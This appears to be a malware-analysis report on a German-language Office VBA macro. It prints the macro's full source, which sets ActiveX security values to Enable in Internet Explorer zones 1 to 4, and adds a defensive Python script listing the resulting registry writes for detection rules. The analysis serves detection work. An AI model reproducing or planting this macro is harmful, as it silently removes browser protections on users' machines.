MALICIOUS
Risk Score: 160
Malware Insights
MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1112 Modify Registry (the script writes Internet Settings zone values; it does not touch Run keys or the Startup folder, so T1547.001 does not apply)
The VBA script creates a WScript.Shell object and uses its RegWrite method to set four Internet Explorer security-zone values to 0 (Enable) as REG_DWORD in each of zones 1 to 4 (Local intranet, Trusted sites, Internet and Restricted sites) under HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\<zone>, for example HKEY_CURRENT_USER\SOFTWARE\MICrosOFT\WINdows\CurrentVersION\Internet settings\Zones\1\1405. The values are 1001 (Download signed ActiveX controls), 1004 (Download unsigned ActiveX controls), 1201 (Initialize and script ActiveX controls not marked as safe) and 1405 (Script ActiveX controls marked safe for scripting). With all four enabled in every zone, including Restricted sites, any content rendered by the Internet Explorer engine can download, instantiate and script unsigned ActiveX controls without a prompt, which removes the browser's main guard against ActiveX-based exploitation. The loop starts at 1, so zone 0 (My Computer) is left unchanged; a comment in the script explains how to include it. The mixed-case key spelling (MICrosOFT\WINdows\CurrentVersION\Internet settings) has no effect on the write, because registry paths are case-insensitive, but it can slip past case-sensitive string matching on the expected key name. The script is not covert: it shows a German message box announcing that ActiveX security of Internet Explorer is off, a second one saying "Done", and carries a source comment claiming the change cannot be undone from the Internet Explorer options. That presentation suggests a deliberately run "unlock" script rather than a dropper, but the resulting exposure of the host is the same.
Heuristics (4)
- VBA macros detected (medium), OLE_VBA_MACROS, 2 related findings: document contains VBA macro code
- WScript.Shell usage (critical), OLE_VBA_WSCRIPT: WScript.Shell usage. Matched lines in script: `MsgBox "Achtung, Active X Security of Internetexplorer off!!!"` / `Set WSHShell = CreateObject("WScript.Shell")` / `For i = 1 To 4`
- CreateObject call (high), OLE_VBA_CREATEOBJ: CreateObject call. Matched lines in script: `MsgBox "Achtung, Active X Security of Internetexplorer off!!!"` / `Set WSHShell = CreateObject("WScript.Shell")` / `For i = 1 To 4`
- Reference to Windows Script Host (high), SC_STR_WSCRIPT: reference to Windows Script Host
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1047 bytes | 4fe30b3bc177625d2baa1ace0d754953219c18ce161baeb2e696e47547774a6b |
Preview script (first 1,000 lines of the extracted script; the ThisDocument and Modul1 modules are concatenated). The German text of the first MsgBox, "Achtung, Active X Security of Internetexplorer off!!!", means "Attention, ActiveX security of Internet Explorer off!!!".

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Modul1"
'this script was written by Edrin@gmx.net
MsgBox "Achtung, Active X Security of Internetexplorer off!!!"
Set WSHShell = CreateObject("WScript.Shell")
For i = 1 To 4
' To trun off localhost-protection(127.0.0.1): i = 0 ()
' Warning: You can´t reset this with options of internet explorer! you have to reset it in registry yourself!!!!!
key = "HKEY_CURRENT_USER\SOFTWARE\MICrosOFT\WINdows\CurrentVersION\Internet settings\Zones\" + chr(i + 48) + "\"
' Chr(49) -> 1 in ASCII
A1 = key + "1405"
A2 = key + "1201"
A3 = key + "1001"
A4 = key + "1004"
WSHShell.RegWrite A1, 0, "REG_DWORD"
WSHShell.RegWrite A2, 0, "REG_DWORD"
WSHShell.RegWrite A3, 0, "REG_DWORD"
WSHShell.RegWrite A4, 0, "REG_DWORD"
Next
MsgBox "Done"
```
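The sixteen RegWrite targets are assembled at run time from a loop variable and string concatenation, so a plain string scan of the macro shows only the key prefix and the four value IDs, not the full set of paths. The Python script below, added here as an example and not part of the report or the analyzer, replays the assignments and the For loop from the decoded VBA and returns every registry value the macro would write, together with the zone and ActiveX action each one controls. `SAMPLE_MACRO` is the report's script preview with the attribute header, comments and MsgBox lines trimmed; the action names are Microsoft's documented meanings of the zone value IDs; `resolve_regwrites`, `eval_vba_string` and `describe` are names chosen for this example. It supports only the VBA subset the sample uses (string literals, Chr() of a sum, variables, + concatenation, a counted For/Next loop and obj.RegWrite), which is enough to turn this macro into a concrete indicator list.

```python
# Added example: replays the macro's string building and loop to list its registry writes.
import re

# Zone numbers and action IDs under HKCU\...\Internet Settings\Zones (Microsoft's documented meanings).
ZONE_NAMES = {"0": "My Computer", "1": "Local intranet", "2": "Trusted sites",
              "3": "Internet", "4": "Restricted sites"}
ACTION_NAMES = {"1001": "Download signed ActiveX controls",
                "1004": "Download unsigned ActiveX controls",
                "1201": "Initialize and script ActiveX controls not marked as safe",
                "1405": "Script ActiveX controls marked safe for scripting"}
SETTING_NAMES = {0: "Enable", 1: "Prompt", 3: "Disable"}

# Copied from the report's script preview (attribute header, comments and MsgBox lines trimmed).
SAMPLE_MACRO = r'''
Set WSHShell = CreateObject("WScript.Shell")
For i = 1 To 4
key = "HKEY_CURRENT_USER\SOFTWARE\MICrosOFT\WINdows\CurrentVersION\Internet settings\Zones\" + chr(i + 48) + "\"
A1 = key + "1405"
A2 = key + "1201"
A3 = key + "1001"
A4 = key + "1004"
WSHShell.RegWrite A1, 0, "REG_DWORD"
WSHShell.RegWrite A2, 0, "REG_DWORD"
WSHShell.RegWrite A3, 0, "REG_DWORD"
WSHShell.RegWrite A4, 0, "REG_DWORD"
Next
'''

# Only the VBA subset the sample uses: "literal", Chr(expr), identifier, For/Next, obj.RegWrite k, v, t
TOKEN_RE = re.compile(r'"([^"]*)"|chr\(([^)]*)\)|([A-Za-z_]\w*)', re.IGNORECASE)
FOR_RE = re.compile(r"^For\s+(\w+)\s*=\s*(-?\d+)\s+To\s+(-?\d+)$", re.IGNORECASE)
NEXT_RE = re.compile(r"^Next\b", re.IGNORECASE)
ASSIGN_RE = re.compile(r"^(\w+)\s*=\s*(.+)$")
REGWRITE_RE = re.compile(r"^\w+\.RegWrite\s+(.+)$", re.IGNORECASE)
ZONE_PATH_RE = re.compile(r"\\Zones\\(\d+)\\(\d+)$", re.IGNORECASE)


def eval_vba_string(expr, env):
    """Concatenate "literals", Chr(n) and variables; Chr() takes sums of ints and variables (i + 48)."""
    parts = []
    for literal, chr_arg, ident in TOKEN_RE.findall(expr):
        if chr_arg:
            parts.append(chr(sum(int(env.get(t.strip().lower(), t)) for t in chr_arg.split("+"))))
        elif ident:
            parts.append(str(env[ident.lower()]))
        else:
            parts.append(literal)
    return "".join(parts)


def _run(lines, env, writes):
    pos = 0
    while pos < len(lines):
        line, pos = lines[pos], pos + 1
        if not line or line.startswith("'"):
            continue
        if m := FOR_RE.match(line):  # collect the body up to the matching Next, replay it per iteration
            body, depth = [], 1
            while pos < len(lines) and depth:
                inner, pos = lines[pos], pos + 1
                depth += bool(FOR_RE.match(inner)) - bool(NEXT_RE.match(inner))
                if depth:
                    body.append(inner)
            for value in range(int(m.group(2)), int(m.group(3)) + 1):
                env[m.group(1).lower()] = value
                _run(body, env, writes)
        elif m := REGWRITE_RE.match(line):  # obj.RegWrite key, data, type
            key, data, *rest = [a.strip() for a in m.group(1).split(",")]
            data = int(data) if data.lstrip("-").isdigit() else eval_vba_string(data, env)
            reg_type = eval_vba_string(rest[0], env) if rest else "REG_SZ"
            writes.append((eval_vba_string(key, env), data, reg_type))
        elif m := ASSIGN_RE.match(line):
            env[m.group(1).lower()] = eval_vba_string(m.group(2), env)


def resolve_regwrites(vba_source):
    """Return every (key, data, type) the macro would pass to RegWrite, in execution order."""
    writes = []
    _run([ln.strip() for ln in vba_source.splitlines()], {}, writes)
    return writes


def describe(writes):
    """Map each zone write to the zone, the ActiveX action it controls and the resulting setting."""
    rows = []
    for key, data, _ in writes:
        if m := ZONE_PATH_RE.search(key):
            rows.append({"zone": ZONE_NAMES.get(m.group(1), "zone " + m.group(1)),
                         "action": ACTION_NAMES.get(m.group(2), "action " + m.group(2)),
                         "setting": SETTING_NAMES.get(data, str(data))})
    return rows


if __name__ == "__main__":
    for row in describe(resolve_regwrites(SAMPLE_MACRO)):
        print(f"{row['zone']:16} {row['action']:60} -> {row['setting']}")
```

Feeding the decoded macros.bas to `resolve_regwrites` yields the 16 full key paths (four per zone) with data 0, which is what a host-based check or a registry-write detection rule should match on rather than the partial prefix visible in the source.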